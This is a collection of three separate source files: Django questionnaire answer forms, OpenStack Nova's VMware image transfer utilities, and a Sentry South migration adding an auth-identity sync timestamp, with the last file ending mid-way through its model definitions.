class TextAnswerForm(AnswerForm):
response = forms.CharField(widget=forms.Textarea)
class Meta:
model = TextAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
class DateAnswerForm(AnswerForm):
def __init__(self, *args, **kwargs):
super(DateAnswerForm, self).__init__(*args, **kwargs)
self.fields['response'].widget = self._get_date_widget(self._initial['question'].answer_sub_type)
class Meta:
model = DateAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire', 'old_response')
def _get_date_widget(self, date_answer_sub_type):
if date_answer_sub_type == "MM/YYYY":
return forms.DateInput(attrs={'class': 'form-control date-time-picker', 'data-date-format': 'mm/yyyy',
'data-date-option': 'mm'})
else:
return forms.DateInput(attrs={'class': 'form-control date-time-picker input-question-id-%s' % self.question.id, 'data-date-format': 'dd/mm/yyyy',
'data-date-option': 'dd'})
class MultiChoiceAnswerForm(AnswerForm):
response = ModelChoiceField(queryset=None, widget=forms.Select(), required=False)
specified_option = forms.CharField(max_length=50, widget=forms.HiddenInput(), required=False)
def __init__(self, *args, **kwargs):
super(MultiChoiceAnswerForm, self).__init__(*args, **kwargs)
query_set = self._get_response_choices(kwargs)
self.fields['response'].widget = self._get_response_widget(query_set)
self.fields['response'].queryset = query_set
self.fields['response'].empty_label = self._set_response_label(query_set)
self.options = query_set
self._set_data()
def _set_data(self):
if self.data:
new_data = copy.deepcopy(self.data)
self.data = new_data
def _set_response_label(self, query_set):
if self.widget_is_radio_button(query_set) or query_set.count() == 1:
return None
return "Choose One"
def widget_is_radio_button(self, query_set):
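# Heuristic: grid questions never use radio buttons; otherwise render
# radios for two-option questions and for the common Yes/No and
# Male/Female option sets.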
group = self._initial['group']
if group.grid:
return False
return query_set.count() == 2 or query_set.filter(text='Yes').exists() or query_set.filter(text='Male').exists()
def _get_response_widget(self, query_set):
if 'option' in self.initial.keys() and self.initial['question'].is_primary:
return forms.Select(attrs={'class': 'hide'})
if self.widget_is_radio_button(query_set):
return SkipRuleRadioWidget(self.question_group.subsection, attrs={'class': 'input-question-id-%s' % self.question.id})
if query_set.exclude(instructions=None).exists() or query_set.exclude(skip_rules=None).exists():
return MultiChoiceAnswerSelectWidget(self.question_group.subsection, question_options=query_set, attrs={'class': 'input-question-id-%s' % self.question.id})
return forms.Select(attrs={'class': 'input-question-id-%s' % self.question.id})
def _get_response_choices(self, kwargs):
all_options = self.question.options.order_by('order')
if 'option' in self._initial:
return all_options.filter(id=self._initial.get('option').id).order_by('order')
return all_options.order_by('order')
def save(self, commit=True, *args, **kwargs):
answer = super(MultiChoiceAnswerForm, self).save(commit=False, *args, **kwargs)
self._save_specified_option_to(answer)
if commit:
answer.save()
return answer
def _save_specified_option_to(self, answer):
specified_option = self.cleaned_data.get('specified_option', None)
if specified_option:
UID = QuestionOption.generate_uid()
new_option, _ = self.question.options.get_or_create(text=specified_option, UID=UID)
answer.response = new_option
self.data[self.add_prefix('response')] = new_option.id
class Meta:
model = MultiChoiceAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
class MultipleResponseForm(AnswerForm):
response = MultipleResponseChoiceField(queryset=None, widget=forms.CheckboxSelectMultiple(), required=False, )
def __init__(self, *args, **kwargs):
super(MultipleResponseForm, self).__init__(*args, **kwargs)
options_all = self.question.options.all()
self.fields['response'].queryset = options_all
self.options = options_all
class Meta:
model = MultipleResponseAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
def _clean_response(self):
response = self.cleaned_data.get('response', [])
selected_options = [option in self.options for option in response]
if len(response) != selected_options.count(True):
message = 'Select a valid choice. The selected option is not one of the available choices.'
self._errors['response'] = self.error_class([message])
def clean(self):
self._clean_response()
return super(MultipleResponseForm, self).clean()
def save(self, commit=True, *args, **kwargs):
answer = super(MultipleResponseForm, self).save(commit=False, *args, **kwargs)
answer.save()
if commit:
self.save_m2m()
return answer
|
|
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility functions for Image transfer and manipulation.
"""
import os
import tarfile
import tempfile
from lxml import etree
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from oslo_utils import units
from oslo_vmware import rw_handles
from nova import exception
from nova.i18n import _, _LE, _LI
from nova import image
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import io_util
# NOTE(mdbooth): We use use_linked_clone below, but don't have to import it
# because nova.virt.vmwareapi.driver is imported first. In fact, it is not
# possible to import it here, as nova.virt.vmwareapi.driver calls
# CONF.register_opts() after the import chain which imports this module. This
# is not a problem as long as the import order doesn't change.
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
IMAGE_API = image.API()
QUEUE_BUFFER_SIZE = 10
LINKED_CLONE_PROPERTY = 'vmware_linked_clone'
class VMwareImage(object):
def __init__(self, image_id,
file_size=0,
os_type=constants.DEFAULT_OS_TYPE,
adapter_type=constants.DEFAULT_ADAPTER_TYPE,
disk_type=constants.DEFAULT_DISK_TYPE,
container_format=constants.CONTAINER_FORMAT_BARE,
file_type=constants.DEFAULT_DISK_FORMAT,
linked_clone=None,
vif_model=constants.DEFAULT_VIF_MODEL):
"""VMwareImage holds values for use in building VMs.
image_id (str): uuid of the image
file_size (int): size of file in bytes
os_type (str): name of guest os (use vSphere names only)
adapter_type (str): name of the adapter's type
disk_type (str): type of disk in thin, thick, etc
container_format (str): container format (bare or ova)
file_type (str): vmdk or iso
linked_clone(bool): use linked clone, or don't
"""
self.image_id = image_id
self.file_size = file_size
self.os_type = os_type
self.adapter_type = adapter_type
self.container_format = container_format
self.disk_type = disk_type
self.file_type = file_type
# NOTE(vui): This should be removed when we restore the
# descriptor-based validation.
if (self.file_type is not None and
self.file_type not in constants.DISK_FORMATS_ALL):
raise exception.InvalidDiskFormat(disk_format=self.file_type)
if linked_clone is not None:
self.linked_clone = linked_clone
else:
self.linked_clone = CONF.vmware.use_linked_clone
self.vif_model = vif_model
@property
def file_size_in_kb(self):
return self.file_size / units.Ki
@property
def is_sparse(self):
return self.disk_type == constants.DISK_TYPE_SPARSE
@property
def is_iso(self):
return self.file_type == constants.DISK_FORMAT_ISO
@property
def is_ova(self):
return self.container_format == constants.CONTAINER_FORMAT_OVA
@classmethod
def from_image(cls, image_id, image_meta=None):
"""Returns VMwareImage, the subset of properties the driver uses.
:param image_id - image id of image
:param image_meta - image metadata we are working with
:return: vmware image object
:rtype: nova.virt.vmwareapi.images.VmwareImage
"""
if image_meta is None:
image_meta = {}
properties = image_meta.get("properties", {})
# calculate linked_clone flag, allow image properties to override the
# global property set in the configurations.
image_linked_clone = properties.get(LINKED_CLONE_PROPERTY,
CONF.vmware.use_linked_clone)
# catch any string values that need to be interpreted as boolean values
linked_clone = strutils.bool_from_string(image_linked_clone)
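# e.g. a property value of 'false', 'False' or '0' becomes the boolean
# False here.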
props = {
'image_id': image_id,
'linked_clone': linked_clone,
'container_format': image_meta.get('container_format')
}
if 'size' in image_meta:
props['file_size'] = image_meta['size']
if 'disk_format' in image_meta:
props['file_type'] = image_meta['disk_format']
props_map = {
'vmware_ostype': 'os_type',
'vmware_adaptertype': 'adapter_type',
'vmware_disktype': 'disk_type',
'hw_vif_model': 'vif_model'
}
for k, v in props_map.items():
if k in properties:
props[v] = properties[k]
return cls(**props)
def start_transfer(context, read_file_handle, data_size,
write_file_handle=None, image_id=None, image_meta=None):
"""Start the data transfer from the reader to the writer.
Reader writes to the pipe and the writer reads from the pipe. This means
that the total transfer time boils down to the slower of the read/write
and not the addition of the two times.
"""
if not image_meta:
image_meta = {}
# The pipe that acts as an intermediate store of data for reader to write
# to and writer to grab from.
thread_safe_pipe = io_util.ThreadSafePipe(QUEUE_BUFFER_SIZE, data_size)
    # The read thread. In the glance case it is an instance of the
    # GlanceFileRead class. The glance client read returns an iterator,
    # and that class wraps the iterator to provide data chunks in calls
    # to read.
read_thread = io_util.IOThread(read_file_handle, thread_safe_pipe)
# In case of Glance - VMware transfer, we just need a handle to the
# HTTP Connection that is to send transfer data to the VMware datastore.
if write_file_handle:
write_thread = io_util.IOThread(thread_safe_pipe, write_file_handle)
    # In case of VMware - Glance transfer, we relinquish the VMware HTTP
    # file read handle to the glance client instance, but to be sure the
    # transfer completed we need to wait for the image status on glance
    # to change to active. The GlanceWriteThread handles that for us.
elif image_id:
write_thread = io_util.GlanceWriteThread(context, thread_safe_pipe,
image_id, image_meta)
# Start the read and write threads.
read_event = read_thread.start()
write_event = write_thread.start()
try:
# Wait on the read and write events to signal their end
read_event.wait()
write_event.wait()
except Exception as exc:
        # If either the read or the write raises an exception, stop both
        # threads so that we don't needlessly keep the other one waiting.
read_thread.stop()
write_thread.stop()
# Log and raise the exception.
LOG.exception(_LE('Transfer data failed'))
raise exception.NovaException(exc)
finally:
        # No matter what, try closing the read and write handles, where
        # applicable.
read_file_handle.close()
if write_file_handle:
write_file_handle.close()
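# Callers pass exactly one of write_file_handle (datastore-bound transfer)
# or image_id (glance-bound transfer); a sketch of the two directions:
#
#     # glance -> datastore
#     start_transfer(context, read_handle, size, write_file_handle=handle)
#     # datastore -> glance
#     start_transfer(context, read_handle, size,
#                    image_id=image_id, image_meta=metadata)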
def upload_iso_to_datastore(iso_path, instance, **kwargs):
LOG.debug("Uploading iso %s to datastore", iso_path,
instance=instance)
    # ISO images are binary; open in 'rb' to avoid newline translation.
    with open(iso_path, 'rb') as iso_file:
write_file_handle = rw_handles.FileWriteHandle(
kwargs.get("host"),
kwargs.get("port"),
kwargs.get("data_center_name"),
kwargs.get("datastore_name"),
kwargs.get("cookies"),
kwargs.get("file_path"),
os.fstat(iso_file.fileno()).st_size)
LOG.debug("Uploading iso of size : %s ",
os.fstat(iso_file.fileno()).st_size)
block_size = 0x10000
data = iso_file.read(block_size)
while len(data) > 0:
write_file_handle.write(data)
data = iso_file.read(block_size)
write_file_handle.close()
LOG.debug("Uploaded iso %s to datastore", iso_path,
instance=instance)
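# A usage sketch (hypothetical connection details; the kwargs mirror the
# rw_handles.FileWriteHandle constructor arguments used above):
#
#     upload_iso_to_datastore('/tmp/config.iso', instance,
#                             host='esx-host', port=443,
#                             data_center_name='dc1',
#                             datastore_name='ds1',
#                             cookies=session_cookies,
#                             file_path='instance-0001/config.iso')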
def fetch_image(context, instance, host, port, dc_name, ds_name, file_path,
cookies=None):
"""Download image from the glance image server."""
image_ref = instance.image_ref
LOG.debug("Downloading image file data %(image_ref)s to the "
"data store %(data_store_name)s",
{'image_ref': image_ref,
'data_store_name': ds_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
read_iter = IMAGE_API.download(context, image_ref)
read_file_handle = rw_handles.ImageReadHandle(read_iter)
write_file_handle = rw_handles.FileWriteHandle(
host, port, dc_name, ds_name, cookies, file_path, file_size)
start_transfer(context, read_file_handle, file_size,
write_file_handle=write_file_handle)
LOG.debug("Downloaded image file data %(image_ref)s to "
"%(upload_name)s on the data store "
"%(data_store_name)s",
{'image_ref': image_ref,
'upload_name': 'n/a' if file_path is None else file_path,
'data_store_name': 'n/a' if ds_name is None else ds_name},
instance=instance)
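# A usage sketch (hypothetical datastore coordinates and cache path):
#
#     fetch_image(context, instance, 'esx-host', 443, 'dc1', 'ds1',
#                 'vmware_base/fake-image-id/fake-image-id.vmdk',
#                 cookies=session_cookies)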
def _build_shadow_vm_config_spec(session, name, size_kb, disk_type, ds_name):
"""Return spec for creating a shadow VM for image disk.
The VM is never meant to be powered on. When used in importing
a disk it governs the directory name created for the VM
and the disk type of the disk image to convert to.
:param name: Name of the backing
:param size_kb: Size in KB of the backing
:param disk_type: VMDK type for the disk
:param ds_name: Datastore name where the disk is to be provisioned
:return: Spec for creation
"""
cf = session.vim.client.factory
controller_device = cf.create('ns0:VirtualLsiLogicController')
controller_device.key = -100
controller_device.busNumber = 0
controller_device.sharedBus = 'noSharing'
controller_spec = cf.create('ns0:VirtualDeviceConfigSpec')
controller_spec.operation = 'add'
controller_spec.device = controller_device
disk_device = cf.create('ns0:VirtualDisk')
# for very small disks allocate at least 1KB
disk_device.capacityInKB = max(1, int(size_kb))
disk_device.key = -101
disk_device.unitNumber = 0
disk_device.controllerKey = -100
disk_device_bkng = cf.create('ns0:VirtualDiskFlatVer2BackingInfo')
if disk_type == constants.DISK_TYPE_EAGER_ZEROED_THICK:
disk_device_bkng.eagerlyScrub = True
elif disk_type == constants.DISK_TYPE_THIN:
disk_device_bkng.thinProvisioned = True
disk_device_bkng.fileName = '[%s]' % ds_name
disk_device_bkng.diskMode = 'persistent'
disk_device.backing = disk_device_bkng
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'add'
disk_spec.fileOperation = 'create'
disk_spec.device = disk_device
vm_file_info = cf.create('ns0:VirtualMachineFileInfo')
vm_file_info.vmPathName = '[%s]' % ds_name
create_spec = cf.create('ns0:VirtualMachineConfigSpec')
create_spec.name = name
create_spec.guestId = 'otherGuest'
create_spec.numCPUs = 1
create_spec.memoryMB = 128
create_spec.deviceChange = [controller_spec, disk_spec]
create_spec.files = vm_file_info
return create_spec
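# NOTE: the negative device keys above (-100 for the controller, -101 for
# the disk) are temporary placeholders that let the disk reference its
# controller within a single config spec; vSphere assigns the real keys
# when the VM is created.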
def _build_import_spec_for_import_vapp(session, vm_name, datastore_name):
vm_create_spec = _build_shadow_vm_config_spec(
session, vm_name, 0, constants.DISK_TYPE_THIN, datastore_name)
client_factory = session.vim.client.factory
vm_import_spec = client_factory.create('ns0:VirtualMachineImportSpec')
vm_import_spec.configSpec = vm_create_spec
return vm_import_spec
def fetch_image_stream_optimized(context, instance, session, vm_name,
ds_name, vm_folder_ref, res_pool_ref):
"""Fetch image from Glance to ESX datastore."""
image_ref = instance.image_ref
LOG.debug("Downloading image file data %(image_ref)s to the ESX "
"as VM named '%(vm_name)s'",
{'image_ref': image_ref, 'vm_name': vm_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
vm_import_spec = _build_import_spec_for_import_vapp(
session, vm_name, ds_name)
read_iter = IMAGE_API.download(context, image_ref)
read_handle = rw_handles.ImageReadHandle(read_iter)
write_handle = rw_handles.VmdkWriteHandle(session,
session._host,
session._port,
res_pool_ref,
vm_folder_ref,
vm_import_spec,
file_size)
start_transfer(context,
read_handle,
file_size,
write_file_handle=write_handle)
imported_vm_ref = write_handle.get_imported_vm()
LOG.info(_LI("Downloaded image file data %(image_ref)s"),
{'image_ref': instance.image_ref}, instance=instance)
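    # Unregister the shadow VM: its backing VMDK remains on the datastore,
    # which is the artifact we actually wanted from the import.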
session._call_method(session.vim, "UnregisterVM", imported_vm_ref)
LOG.info(_LI("The imported VM was unregistered"), instance=instance)
def get_vmdk_name_from_ovf(xmlstr):
"""Parse the OVA descriptor to extract the vmdk name."""
ovf = etree.fromstring(xmlstr)
nsovf = "{%s}" % ovf.nsmap["ovf"]
disk = ovf.find("./%sDiskSection/%sDisk" % (nsovf, nsovf))
file_id = disk.get("%sfileRef" % nsovf)
    # 'file_elem' rather than 'file' so we don't shadow the builtin.
    file_elem = ovf.find('./%sReferences/%sFile[@%sid="%s"]' % (nsovf, nsovf,
                                                                nsovf, file_id))
    vmdk_name = file_elem.get("%shref" % nsovf)
return vmdk_name
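# A sketch of the minimal OVF shape the parser above expects (hypothetical
# file names; both the default and the 'ovf' prefix map to the envelope
# namespace, as in real descriptors):
#
#     xmlstr = '''<Envelope
#         xmlns="http://schemas.dmtf.org/ovf/envelope/1"
#         xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1">
#       <References><File ovf:id="file1" ovf:href="disk1.vmdk"/></References>
#       <DiskSection><Disk ovf:fileRef="file1"/></DiskSection>
#     </Envelope>'''
#     get_vmdk_name_from_ovf(xmlstr)  # -> 'disk1.vmdk'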
def fetch_image_ova(context, instance, session, vm_name, ds_name,
vm_folder_ref, res_pool_ref):
"""Download the OVA image from the glance image server to the
Nova compute node.
"""
image_ref = instance.image_ref
LOG.debug("Downloading OVA image file %(image_ref)s to the ESX "
"as VM named '%(vm_name)s'",
{'image_ref': image_ref, 'vm_name': vm_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
vm_import_spec = _build_import_spec_for_import_vapp(
session, vm_name, ds_name)
read_iter = IMAGE_API.download(context, image_ref)
ova_fd, ova_path = tempfile.mkstemp()
try:
# NOTE(arnaud): Look to eliminate first writing OVA to file system
        with os.fdopen(ova_fd, 'wb') as fp:
for chunk in read_iter:
fp.write(chunk)
with tarfile.open(ova_path, mode="r") as tar:
vmdk_name = None
for tar_info in tar:
if tar_info and tar_info.name.endswith(".ovf"):
extracted = tar.extractfile(tar_info.name)
xmlstr = extracted.read()
vmdk_name = get_vmdk_name_from_ovf(xmlstr)
elif vmdk_name and tar_info.name.startswith(vmdk_name):
# Actual file name is <vmdk_name>.XXXXXXX
extracted = tar.extractfile(tar_info.name)
write_handle = rw_handles.VmdkWriteHandle(
session,
session._host,
session._port,
res_pool_ref,
vm_folder_ref,
vm_import_spec,
file_size)
start_transfer(context,
extracted,
file_size,
write_file_handle=write_handle)
extracted.close()
LOG.info(_LI("Downloaded OVA image file %(image_ref)s"),
{'image_ref': instance.image_ref}, instance=instance)
imported_vm_ref = write_handle.get_imported_vm()
session._call_method(session.vim, "UnregisterVM",
imported_vm_ref)
LOG.info(_LI("The imported VM was unregistered"),
instance=instance)
return
raise exception.ImageUnacceptable(
reason=_("Extracting vmdk from OVA failed."),
image_id=image_ref)
finally:
os.unlink(ova_path)
def upload_image_stream_optimized(context, image_id, instance, session,
vm, vmdk_size):
"""Upload the snapshotted vm disk file to Glance image server."""
LOG.debug("Uploading image %s", image_id, instance=instance)
metadata = IMAGE_API.get(context, image_id)
read_handle = rw_handles.VmdkReadHandle(session,
session._host,
session._port,
vm,
None,
vmdk_size)
# Set the image properties. It is important to set the 'size' to 0.
# Otherwise, the image service client will use the VM's disk capacity
# which will not be the image size after upload, since it is converted
# to a stream-optimized sparse disk.
image_metadata = {'disk_format': 'vmdk',
'is_public': metadata['is_public'],
'name': metadata['name'],
'status': 'active',
'container_format': 'bare',
'size': 0,
'properties': {'vmware_image_version': 1,
'vmware_disktype': 'streamOptimized',
'owner_id': instance.project_id}}
# Passing 0 as the file size since data size to be transferred cannot be
# predetermined.
start_transfer(context,
read_handle,
0,
image_id=image_id,
image_meta=image_metadata)
LOG.debug("Uploaded image %s to the Glance image server", image_id,
instance=instance)
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AuthIdentity.last_synced'
db.add_column('sentry_authidentity', 'last_synced',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
def backwards(self, orm):
# Deleting field 'AuthIdentity.last_synced'
db.delete_column('sentry_authidentity', 'last_synced')
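    # With South, this migration runs through the usual workflow (sketch;
    # the exact invocation depends on the deployment):
    #
    #     python manage.py migrate sentry                    # forwards()
    #     python manage.py migrate sentry <prev_migration>   # backwards()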
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'audit_actors'", 'to': "orm['sentry.User']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.file': {
'Meta': {'unique_together': "(('name', 'checksum'),)", 'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
